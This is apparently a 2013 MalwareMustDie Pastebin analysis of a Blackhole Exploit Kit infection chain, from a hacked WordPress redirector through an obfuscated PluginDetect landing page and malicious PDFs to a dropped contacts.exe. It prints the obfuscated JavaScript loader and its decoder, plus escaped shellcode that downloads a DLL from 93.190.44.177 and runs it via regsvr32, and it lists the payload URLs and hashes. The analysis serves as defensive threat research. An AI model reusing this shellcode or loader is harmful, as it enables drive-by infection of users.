
#BHEK New Obf + New Path of files : ../mix/* + ../closest/*

MalwareMustDie Jan 7th, 2013 107 Never
  1. // MalwareMustDie -
  2. // New Obf + New Path of files : ../mix/* + ../closest/*
  3. // Payload dropped via PDF only,
  4. // @unixfreaxjp /malware]$ date
  5. // Thu Jan  3 06:49:30 JST 2013
  6. // THIS IS A QUICK GUIDE TO DECODE BHEK ONLY,
  7. // SORRY FRIENDS, CANNOT WRITE BLOG AT THE MOMENT...
  8. // Saw the below infector using WP site:
  9. // h00p://bungatani.com/wp-content/plugins/akismet/track.php?c005
  10. // A quick check shows it is a redirector to an Ubuntu server running Blackhole...
  11.  
  12. // prisoners:
  13. 98yf8913fjipgjialhg8239jgighnjh4i6k5o.php      5ee2c9541878ccf3d04e1ac696f44bca
  14. b264b.pdf                                      a9480ade56f5631bbc7eb4f71093a3ac
  15. contacts.exe                                   aed9ac49b10a75d54f37079b18c11153
  16. infector.pdf                                   4655d90088b981bc93d4437f8cc55728
  17.  
  18. //files:
  19.  
  20. 2013/01/03  03:39            84,298 98yf8913fjipgjialhg8239jgighnjh4i6k5o.php
  21. 2013/01/03  05:22            10,053 b264b.pdf
  22. 2013/01/03  06:02            73,728 contacts.exe
  23. 2013/01/03  05:20            21,683 infector.pdf
  24.  
  25. // PoC:
  26.  
  27. --03:39:17--  h00p://bungatani.com/wp-content/plugins/akismet/track.php?c005
  28.            => `track.php@c005'
  29. Resolving bungatani.com... seconds 0.00, 174.120.9.188
  30. Caching bungatani.com => 174.120.9.188
  31. Connecting to bungatani.com|174.120.9.188|:80... seconds 0.00, connected.
  32.  
  33. ---request begin---
  34. GET /wp-content/plugins/akismet/track.php?c005 HTTP/1.0
  35. Referer: h00p://google.com/url?
  36. User-Agent: #MalwareMustDie get bored..
  37. Accept: */*
  38. Host: bungatani.com
  39. Connection: Keep-Alive
  40.  :
  41. HTTP request sent, awaiting response...
  42.  :  
  43. HTTP/1.1 302 Found
  44. Date: Wed, 02 Jan 2013 18:39:11 GMT
  45. Server: Apache
  46. Location: h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php
  47.  :
  48. Content-Length: 0
  49. Keep-Alive: timeout=5, max=75
  50. Connection: Keep-Alive
  51. Content-Type: text/html
  52.  :
  53. 302 Found
  54. Location: h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php
  55. [following]
  56. Skipping 0 bytes of body: [] done.
  57. --03:39:17--  h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php
  58.           => `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php'
  59. conaddr is: 174.120.9.188
  60. Connecting to 93.190.44.177:80... seconds 0.00, connected.
  61. Created socket 1880.
  62.   :
  63. GET /closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php HTTP/1.0
  64. Referer: h00p://google.com/url?
  65. User-Agent: #MalwareMustDie get bored..
  66. Accept: */*
  67. Host: 93.190.44.177
  68. Connection: Keep-Alive
  69.   :
  70. HTTP request sent, awaiting response...
  71.   :
  72. HTTP/1.1 200 OK
  73. Server: nginx/1.2.6
  74. Date: Wed, 02 Jan 2013 18:39:13 GMT
  75. Content-Type: text/html
  76. Connection: close
  77. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  78. Vary: Accept-Encoding
  79.   :
  80. 200 OK
  81. Length: unspecified [text/html]
  82. Closed fd 1880
  83. 03:39:21 (53.25 KB/s) - `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php' saved [84298]
  84.  
  85. // It's an obfuscated PluginDetect script, a bit new in some ways,
  86.  
  87. Code: GOTO http://pastebin.com/5nyMBuTj
  88.  
  89.  
  90. // See the code the first one is an applet code:
  91.  
  92. <applet archive="/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?lgw=nwez&ujrttao=pknugvqw" code="hw">
  93. <param value="Dyy3Ojjc1w6cfwLLw6BBj%-tieiyjcrS.rc61.C8" name="&#00118;&#0097;&#00108;"/>
  94. <param value="3AC8V-DArh1cCA8ADoCDL8Pq4tw3D3xk.b1fO6oO68O68O11RDeb6qO6.Oh_O60O16O6tO6-O6-O1fO16Ryb6.RKFbSRKlbe" name="&#00112;&#00114;&#00105;&#00109;&#00101;" />
  95. </applet>
  96.  
  97. // and we have the obfuscated PluginDetect script
  98. // below is the structure:
  99.  
  100.  
  101. // obfuscated data merger logic:
  102.  
  103. dd="i";                 // tag name looked up later via document.getElementsByTagName(dd)
  104. pp="e"+"In";            // not used in the excerpt shown here
  105. asd=function()          // concatenates the "z0","z1",... attributes of the global element `a` into the global string `s`
  106.      {
  107.      for(i=0;;i++)
  108.        {
  109.         r=a.getAttribute("z"+i);
  110.         if(r){s=s+r;}else break;   // stops at the first missing "zN" attribute
  111.        }
  112.      };
  113. v="setAttribute";       // alias used below as a[v]("z0", ...) to hide the method name from string matching
  114.  
  115. // obfuscated data
  116.  
  117.  
  118. a[v]("z0","-[0-9,a-z]...-[0-9,a-z]");</script><script>
  119.       :
  120.      "z27"
  121.  
  122. // deobfuscation part...
  123.  
  124. document.body.appendChild(a);  // `a` is the element created earlier (not shown in this excerpt)
  125. if(document.getElementsByTagName("d"+"iv")[0].style.left===""){ss=String;a=document["getElementsB"+"yTagName"](dd); // "d"+"iv" and the split method name hide "div"/getElementsByTagName from simple string matching; dd is "i", so `a` becomes the list of <i> elements
  126. a=a[0];                        // first <i> element carries the z0..zN attributes
  127. s=new String();
  128. asd();                         // s = z0 + z1 + ... (see asd above)
  129. a=s;                           // `a` is now the concatenated encoded string
  130. s=new String();                // reused as the output buffer
  131. e=eval;                        // aliased so the word "eval" never appears in the call below
  132. cxz=function(){if(a["su"+"bstr"](i,1)=="-")i+=2;};   // "-" acts as a separator: skip it and the following character
  133. p=parseInt;
  134.  
  135. // this is the badass' deobfuscation logic! he thinks it's cool code.. actually sucks...
  136. for(i=0;a.length>i;i+=2){    
  137.         cxz();
  138.         s=s+(ss["fromChar"+"Code"]((p(a["substr"](i,2),27)+57)/5));   // two chars -> base-27 integer, +57, /5 -> one character code
  139. }
  140. // end of deobfuscation logic
  141.  
  142. if(window.document)try{document.body*=document;}catch(asfas){e("if(1)"+s);}} // the assignment to document.body is apparently expected to throw, so the catch branch runs the decoded script through eval (e)
  143.  
  144.  
  145. ///// let's make it simple!
  146.  
  147. GOTO: http://pastebin.com/x5NCqQaL
  148.  
  149.  
  150. // Deobfuscate it & make it easy to read...
  151.  
  152. GOTO: http://pastebin.com/GtknERxr
  153.  
  154.  
  155. // the dropped PDF
  156.  
  157.  function p1()   // embeds the first PDF: an <object> whose data URL hits the same landing .php with base-33 encoded parameters (see x() below)
  158.  {
  159.    var d=document.createElement("object");
  160.    d.setAttribute("data","/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?klpiphtw="+x("c833f")+"&zfbqrto="+x("pvr")+"&amk=1k:1f:2w:1m:31:1o:1l:1l:30:31&nakupk="+x(pdfver.join(".")));   // pdfver is defined outside this excerpt; from the name, presumably the detected PDF reader version
  161.    d.setAttribute("type","application/pdf");
  162.    document.body.appendChild(d);   // appending the element triggers the PDF request
  163.  }
  164.  function p2()   // same pattern as p1 with different parameter names and x("z") instead of x("pvr"); yields the second PDF
  165.  {
  166.    var d=document.createElement("object");
  167.    d.setAttribute("data","/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?gbxec="+x("c833f")+"&kmchk="+x("z")+"&sgolnjs=1k:1f:2w:1m:31:1o:1l:1l:30:31&atdweawi="+x(pdfver.join(".")));   // pdfver is defined outside this excerpt
  168.    d.setAttribute("type","application/pdf");
  169.    document.body.appendChild(d);   // appending the element triggers the PDF request
  170.  }
  171.  
  172.  
  173. // use their formula to crack...
  174.  
  175.  function x(s)   // encodes each character code of s in base 33 and joins the digits with ":"
  176.  {
  177.    d=[];                                  // note: d, i and k are implicit globals
  178.    for(i=0;i<s.length;i++)
  179.    {
  180.      k=(s.charCodeAt(i)).toString(33);    // e.g. "c" (99) -> "30"
  181.      d.push(k);
  182.    };
  183.    return d.join(":");                    // e.g. x("c833f") -> "30:1n:1i:1i:33" (see results below)
  184.  }
  185. a=x("c833f");
  186. document.write(a);  
  187.  
  188. // results:
  189.  
  190. x("c833f") ---> 30:1n:1i:1i:33
  191. x("pvr")   ---> 3d:3j:3f
  192. x("z")     ---> 3n
  193. x(pdfver.join("."))  ---> 1k:1d:1f:1d:1g:1d:1f
  194.  
  195. // assemble the url:
  196.  
  197. // PDF1:
  198. h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?klpiphtw=30:1n:1i:1i:33&zfbqrto=3d:3j:3f&amk=1k:1f:2w:1m:31:1o:1l:1l:30:31&nakupk=1k:1d:1f:1d:1g:1d:1f
  199.  
  200. // PDF2:
  201. h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?gbxec=30:1n:1i:1i:33&kmchk=3n&sgolnjs=1k:1f:2w:1m:31:1o:1l:1l:30:31&atdweawi=1k:1d:1f:1d:1g:1d:1f
  202.  
  203.  
  204. // download the PDF:
  205.  
  206. --05:20:46--  h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?klpiphtw=30:1n:1i:1i:33&zfbqrto=3d:3j:3f&amk=1k:1f:2w:1m:31:1o:1l:1l:30:31&nakupk=1k:1d:1f:1d:1g:1d:1f
  207.            => `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@klpiphtw=30%3A1n%3A1i%3A1i%3A33&zfbqrto=3d%3A3j%3A3f&amk=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&nakupk=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f'
  208. Connecting to 93.190.44.177:80... seconds 0.00, connected.
  209.   :
  210. GET /closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?klpiphtw=30:1n:1i:1i:33&zfbqrto=3d:3j:3f&amk=1k:1f:2w:1m:31:1o:1l:1l:30:31&nakupk=1k:1d:1f:1d:1g:1d:1f HTTP/1.0
  211. Referer: h00p://google.com/url?
  212. User-Agent: #MalwareMustDie get bored..
  213. Accept: */*
  214. Host: 93.190.44.177
  215. Connection: Keep-Alive
  216.   :
  217. HTTP request sent, awaiting response...
  218.   :
  219. HTTP/1.1 200 OK
  220. Server: nginx/1.2.6
  221. Date: Wed, 02 Jan 2013 20:20:41 GMT
  222. Content-Type: application/pdf
  223. Content-Length: 21683
  224. Connection: keep-alive
  225. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  226. ETag: "b0f35ed29d77e484b0aae4ed97587cca"
  227. Last-Modified: Wed, 02 Jan 2013 20:20:43 GMT
  228. Accept-Ranges: bytes
  229.   :
  230. 200 OK
  231. Length: 21,683 (21K) [application/pdf]
  232. 05:20:48 (33.78 KB/s) - `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@klpiphtw...' saved [21683/21683]
  233.  
  234.  
  235. --05:22:02--  h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?gbxec=30:1n:1i:1i:33&kmchk=3n&sgolnjs=1k:1f:2w:1m:31:1o:1l:1l:30:31&atdweawi=1k:1d:1f:1d:1g:1d:1f
  236.           => `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@gbxec=30%3A1n%3A1i%3A1i%3A33&kmchk=3n&sgolnjs=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&atdweawi=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f'
  237. Connecting to 93.190.44.177:80... seconds 0.00, connected.
  238.   :
  239. GET /closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?gbxec=30:1n:1i:1i:33&kmchk=3n&sgolnjs=1k:1f:2w:1m:31:1o:1l:1l:30:31&atdweawi=1k:1d:1f:1d:1g:1d:1f HTTP/1.0
  240. Referer: h00p://google.com/url?
  241. User-Agent: #MalwareMustDie get bored..
  242. Accept: */*
  243. Host: 93.190.44.177
  244. Connection: Keep-Alive
  245.   :
  246. HTTP request sent, awaiting response...
  247.   :
  248. HTTP/1.1 200 OK
  249. Server: nginx/1.2.6
  250. Date: Wed, 02 Jan 2013 20:21:57 GMT
  251. Content-Type: application/pdf
  252. Content-Length: 10053
  253. Connection: keep-alive
  254. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  255. Accept-Ranges: bytes
  256. Content-Disposition: inline; filename=b264b.pdf
  257.   :
  258. 200 OK
  259. Length: 10,053 (9.8K) [application/pdf]
  260. 05:22:04 (27.58 KB/s) - `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@gbxec...' saved [10053/10053]
  261.  
  262.  
  263.  
  264. // The first PDF was served without a filename, so let's call it infector.pdf,
  265. // while the second PDF was served as "b264b.pdf", so let's use that name.
  266. 2013/01/03  05:22            10,053 b264b.pdf
  267. 2013/01/03  05:20            21,683 infector.pdf
  268.  
  269.  
  270. // I started with the bigger PDF file.. by experience, the biggest one carries the payload stuff..
  271.  
  272. // found another javascript obfuscation...
  273.  
  274. Code: GOTO: http://pastebin.com/u6Kbatz8
  275.  
  276. // I decode it here....
  277.  
  278. Code: GOTO: http://pastebin.com/y0XjEfAX
  279.  
  280.  
  281. // to find shellcode below:
  282.  
  283.  bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u392f%u2e33%u3931%u2e30%u3434%u312e%u3737%u632f%u6f6c%u6573%u7473%u392f%u7938%u3866%u3139%u6633%u696a%u6770%u696a%u6c61%u6768%u3238%u3933%u676a%u6769%u6e68%u686a%u6934%u6b36%u6f35%u702e%u7068%u703f%u6676%u6472%u333d%u3a30%u6e31%u313a%u3a69%u6931%u333a%u2633%u7a75%u7868%u3d70%u6b31%u313a%u3a66%u7732%u313a%u3a6d%u3133%u313a%u3a6f%u6c31%u313a%u3a6c%u3033%u333a%u2631%u7179%u3d71%u6831%u6a26%u636b%u616c%u6d75%u3d6f%u6c65%u786e%u2665%u696a%u7a65%u636f%u676c%u793d%u6864%u006f%u0000';
  284.  
  285. // translated:
  286.  
  287. 66 83 e4 fc fc 85 e4 75  34 e9 5f 33 c0 64 8b 40    f......u4._3.d.@
  288. 30 8b 40 0c 8b 70 1c 56  8b 76 08 33 db 66 8b 5e    0.@..p.V.v.3.f.^
  289. 3c 03 74 33 2c 81 ee 15  10 ff ff b8 8b 40 30 c3    <.t3,........@0.
  290. 46 39 06 75 fb 87 34 24  85 e4 75 51 e9 eb 4c 51    F9.u..4$..uQ..LQ
  291. 56 8b 75 3c 8b 74 35 78  03 f5 56 8b 76 20 03 f5    V.u<.t5x..V.v...
  292. 33 c9 49 41 fc ad 03 c5  33 db 0f be 10 38 f2 74    3.IA....3....8.t
  293. 08 c1 cb 0d 03 da 40 eb  f1 3b 1f 75 e6 5e 8b 5e    ......@..;.u.^.^
  294. 24 03 dd 66 8b 0c 4b 8d  46 ec ff 54 24 0c 8b d8    $..f..K.F..T$...
  295. 03 dd 8b 04 8b 03 c5 ab  5e 59 c3 eb 53 ad 8b 68    ........^Y..S..h
  296. 20 80 7d 0c 33 74 03 96  eb f3 8b 68 08 8b f7 6a    ..}.3t.....h...j
  297. 05 59 e8 98 ff ff ff e2  f9 e8 00 00 00 00 58 50    .Y............XP
  298. 6a 40 68 ff 00 00 00 50  83 c0 19 50 55 8b ec 8b    j@h....P...PU...
  299. 5e 10 83 c3 05 ff e3 68  6f 6e 00 00 68 75 72 6c    ^......hon..hurl
  300. 6d 54 ff 16 83 c4 08 8b  e8 e8 61 ff ff ff eb 02    mT........a.....
  301. eb 72 81 ec 04 01 00 00  8d 5c 24 0c c7 04 24 72    .r.......\$...$r
  302. 65 67 73 c7 44 24 04 76  72 33 32 c7 44 24 08 20    egs.D$.vr32.D$..
  303. 2d 73 20 53 68 f8 00 00  00 ff 56 0c 8b e8 33 c9    -s.Sh.....V...3.
  304. 51 c7 44 1d 00 77 70 62  74 c7 44 1d 05 2e 64 6c    Q.D..wpbt.D...dl
  305. 6c c6 44 1d 09 00 59 8a  c1 04 30 88 44 1d 04 41    l.D...Y...0.D..A
  306. 51 6a 00 6a 00 53 57 6a  00 ff 56 14 85 c0 75 16    Qj.j.SWj..V...u.
  307. 6a 00 53 ff 56 04 6a 00  83 eb 0c 53 ff 56 04 83    j.S.V.j....S.V..
  308. c3 0c eb 02 eb 13 47 80  3f 00 75 fa 47 80 3f 00    ......G.?.u.G.?.
  309. 75 c4 6a 00 6a fe ff 56  08 e8 9c fe ff ff 8e 4e    u.j.j..V.......N
  310. 0e ec 98 fe 8a 0e 89 6f  01 bd 33 ca 8a 5b 1b c6    .......o..3..[..
  311. 46 79 36 1a 2f 70 68 74  74 70 3a 2f 2f 39 33 2e    Fy6./ph00p://93.
  312. 31 39 30 2e 34 34 2e 31  37 37 2f 63 6c 6f 73 65    190.44.177/close
  313. 73 74 2f 39 38 79 66 38  39 31 33 66 6a 69 70 67    st/98yf8913fjipg
  314. 6a 69 61 6c 68 67 38 32  33 39 6a 67 69 67 68 6e    jialhg8239jgighn
  315. 6a 68 34 69 36 6b 35 6f  2e 70 68 70 3f 70 76 66    jh4i6k5o.php?pvf
  316. 72 64 3d 33 30 3a 31 6e  3a 31 69 3a 31 69 3a 33    rd=30:1n:1i:1i:3
  317. 33 26 75 7a 68 78 70 3d  31 6b 3a 31 66 3a 32 77    3&uzhxp=1k:1f:2w
  318. 3a 31 6d 3a 33 31 3a 31  6f 3a 31 6c 3a 31 6c 3a    :1m:31:1o:1l:1l:
  319. 33 30 3a 33 31 26 79 71  71 3d 31 68 26 6a 6b 63    30:31&yqq=1h&jkc
  320. 6c 61 75 6d 6f 3d 65 6c  6e 78 65 26 6a 69 65 7a    laumo=elnxe&jiez
  321. 6f 63 6c 67 3d 79 64 68  6f 00 00 00                oclg=ydho...    
  322.  
  323. // API calls observed while reversing the shellcode:
  324.  
  325. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020b4, dwSize=255)
  326. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  327. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  328. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?pvfrd=30:1n:1i:1i:33&uzhxp=1k:1f:2w:1m:31:1o:1l:1l:30:31&yqq=1h&jkclaumo=elnxe&jiezoclg=ydho , lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)   0
  329. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  330. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  331. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  332.  
  333. // Got the payload url:
  334.  
  335. h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?pvfrd=30:1n:1i:1i:33&uzhxp=1k:1f:2w:1m:31:1o:1l:1l:30:31&yqq=1h&jkclaumo=elnxe&jiezoclg=ydho
  336.  
  337.  
  338. // Get the payload....
  339.  
  340. --06:02:30--  h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?pvfrd=30:1n:1i:1i:33&uzhxp=1k:1f:2w:1m:31:1o:1l:1l:30:31&yqq=1h&jkclaumo=elnxe&jiezoclg=ydho
  341.            => `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@pvfrd=30%3A1n%3A1i%3A1i%3A33&uzhxp=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&yqq=1h&jkclaumo=elnxe&jiezoclg=ydho'
  342. Connecting to 93.190.44.177:80... seconds 0.00, connected.
  343.   :
  344. GET /closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?pvfrd=30:1n:1i:1i:33&uzhxp=1k:1f:2w:1m:31:1o:1l:1l:30:31&yqq=1h&jkclaumo=elnxe&jiezoclg=ydho HTTP/1.0
  345. Referer: h00p://google.com/url?
  346. User-Agent: #MalwareMustDie get bored..
  347. Accept: */*
  348. Host: 93.190.44.177
  349. Connection: Keep-Alive
  350.   :
  351. HTTP request sent, awaiting response...
  352.   :
  353. HTTP/1.1 200 OK
  354. Server: nginx/1.2.6
  355. Date: Wed, 02 Jan 2013 21:02:25 GMT
  356. Content-Type: application/x-msdownload
  357. Content-Length: 73728
  358. Connection: keep-alive
  359. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  360. Pragma: public
  361. Expires: Wed, 02 Jan 2013 21:02:27 GMT
  362. Cache-Control: must-revalidate, post-check=0, pre-check=0
  363. Cache-Control: private
  364. Content-Disposition: attachment; filename="contacts.exe"
  365. Content-Transfer-Encoding: binary
  366.   :
  367. 200 OK
  368. Length: 73,728 (72K) [application/x-msdownload]
  369. 06:02:33 (46.32 KB/s) - `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@pvfrd=30%3A1n%3A1i%3A1i%3A33&uzhxp=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&yqq=1h&jkclaumo=elnxe&jiezoclg=ydho' saved [73728/73728]
  370.  
  371.  
  372. // we got the binary called contacts.exe :-)
  373.  
  374. 0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
  375. 0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
  376. 0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  377. 0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
  378. 0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
  379. 0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
  380. 0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
  381. 0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
  382. 0080   50 45 00 00 4C 01 07 00 28 1A E4 50 00 00 00 00    PE..L...(..P....
  383. 0090   00 00 00 00 E0 00 0F 03 0B 01 02 04 00 32 00 00    .............2..
  384. 00A0   00 74 00 00 00 04 00 00 40 12 00 00 00 10 00 00    .t......@.......
  385.  
  386. // sigs of packer...
  387.  
  388. 06E0   90 90 90 90 90 90 90 EB 11 EF C4 A1 5D 58 C6 9D    ............]X..
  389. 06F0   87 B4 5C F6 B8 47 AC 6F 86 F4 EB 11 EF C4 A1 5D    .....G.o.......]
  390. 0700   58 C6 9D 87 B4 5C F6 B8 47 AC 6F 86 F4 90 90 90    X.......G.o.....
  391. 0710   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  392. 0720   90 90 90 90 90 90 90 90 90 90 90 90 90 EB 11 EF    ................
  393. 0730   C4 A1 5D 58 C6 9D 87 B4 5C F6 B8 47 AC 6F 86 F4    ..]X.......G.o..
  394. 0740   EB 11 EF C4 A1 5D 58 C6 9D 87 B4 5C F6 B8 47 AC    .....]X.......G.
  395. 0750   6F 86 F4 E8 90 1C 00 00 85 C0 75 0F C7 85 94 EF    o.........u.....
  396. 0760   FF FF 00 00 00 00 E9 CF 06 00 00 90 90 90 90 90    ................
  397. 0770   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  398. 0780   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  399. 0790   90 90 90 EB 11 EF C4 A1 5D 58 C6 9D 87 B4 5C F6    ........]X......
  400. 07A0   B8 47 AC 6F 86 F4 EB 11 EF C4 A1 5D 58 C6 9D 87    .G.o.......]X...
  401. 07B0   B4 5C F6 B8 47 AC 6F 86 F4 90 90 90 90 90 90 90    ....G.o.........
  402. 07C0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  403. 07D0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  404. 07E0   90 EB 11 EF C4 A1 5D 58 C6 9D 87 B4 5C F6 B8 47    ......]X.......G
  405. 07F0   AC 6F 86 F4 EB 11 EF C4 A1 5D 58 C6 9D 87 B4 5C    .o.......]X.....
  406. :                      :                                       :
  407. 0E40   C9 C3 90 90 55 89 E5 AA 52 54 82 9A 4B A0 38 96    ....U...RT..K.8.
  408. 0E50   AA 52 54 82 9A 4B A0 38 96 AA 52 54 82 9A 4B A0    .RT..K.8..RT..K.
  409. 0E60   38 96 AA 52 54 82 9A 4B A0 38 96 AA 52 54 82 9A    8..RT..K.8..RT..
  410. 0E70   4B A0 38 96 D8 F8 AA 52 54 82 9A 4B A0 38 96 AA    K.8....RT..K.8..
  411. 0E80   52 54 82 9A 4B A0 38 96 AA 52 54 82 9A 4B A0 38    RT..K.8..RT..K.8
  412. 0E90   96 AA 52 54 82 9A 4B A0 38 96 AA 52 54 82 9A 4B    ..RT..K.8..RT..K
  413. 0EA0   A0 38 96 D8 F8 AA 52 54 82 9A 4B A0 38 96 AA 52    .8....RT..K.8..R
  414. 0EB0   54 82 9A 4B A0 38 96 AA 52 54 82 9A 4B A0 38 96    T..K.8..RT..K.8.
  415. 0EC0   AA 52 54 82 9A 4B A0 38 96 AA 52 54 82 9A 4B A0    .RT..K.8..RT..K.
  416. 0ED0   38 96 D8 F8 AA 52 54 82 9A 4B A0 38 96 AA 52 54    8....RT..K.8..RT
  417. 0EE0   82 9A 4B A0 38 96 AA 52 54 82 9A 4B A0 38 96 AA    ..K.8..RT..K.8..
  418. 0EF0   52 54 82 9A 4B A0 38 96 AA 52 54 82 9A 4B A0 38    RT..K.8..RT..K.8
  419. 0F00   96 D8 F8 AA 52 54 82 9A 4B A0 38 96 AA 52 54 82    ....RT..K.8..RT.
  420. 0F10   9A 4B A0 38 96 AA 52 54 82 9A 4B A0 38 96 AA 52    .K.8..RT..K.8..R
  421. 0F20   54 82 9A 4B A0 38 96 AA 52 54 82 9A 4B A0 38 96    T..K.8..RT..K.8.
  422. 0F30   D8 F8 AA 52 54 82 9A 4B A0 38 96 AA 52 54 82 9A    ...RT..K.8..RT..
  423.  
  424. // see Virus total report in "Additional Information" for binary's detail:
  425. https://www.virustotal.com/file/b9c4b1ecaa15631735cd56ac3c70a2492b2ebc052aa1b3187178765e508e2678/analysis/
  426.  
  427.  
  428. Entry Point: 0x1240
  429. Compile Time: 0x50E41A28 [Wed Jan 02 11:29:44 2013 UTC]
  430.  
  431. section:
  432. .bss
  433. code was packed with ID: MingWin32 GCC 3.x (Database Result)
  434.  
  435.  
  436. // readable calls..
  437.  
  438. Name:                          0xA43C    
  439. FirstThunk:                    0xA148    
  440.  
  441. KERNEL32.dll.AddAtomA Hint[1]
  442. KERNEL32.dll.ExitProcess Hint[155]
  443. KERNEL32.dll.FindAtomA Hint[175]
  444. KERNEL32.dll.GetAtomNameA Hint[220]
  445. KERNEL32.dll.GetModuleHandleA Hint[335]
  446. KERNEL32.dll.SetUnhandledExceptionFilter Hint[735]
  447.  
  448. Name:                          0xA414    
  449. FirstThunk:                    0xA130    
  450.  
  451. COMCTL32.DLL.CreateToolbarEx Hint[16]
  452. COMCTL32.DLL.CreateUpDownControl Hint[17]
  453. COMCTL32.DLL.PropertySheetA Hint[97]
  454. COMCTL32.DLL.Str_SetPtrW Hint[129]
  455.  
  456. Here's the VT report:
  457.  
  458. SHA1:   e6561522623e3aff12f806bed88eb326b78af7e1
  459. MD5:    aed9ac49b10a75d54f37079b18c11153
  460. File size:      72.0 KB ( 73728 bytes )
  461. File name:      contacts.exe
  462. File type:      Win32 EXE
  463. Detection ratio:        7 / 46
  464. Analysis date:  2013-01-02 21:23:18 UTC ( 1 分 ago )
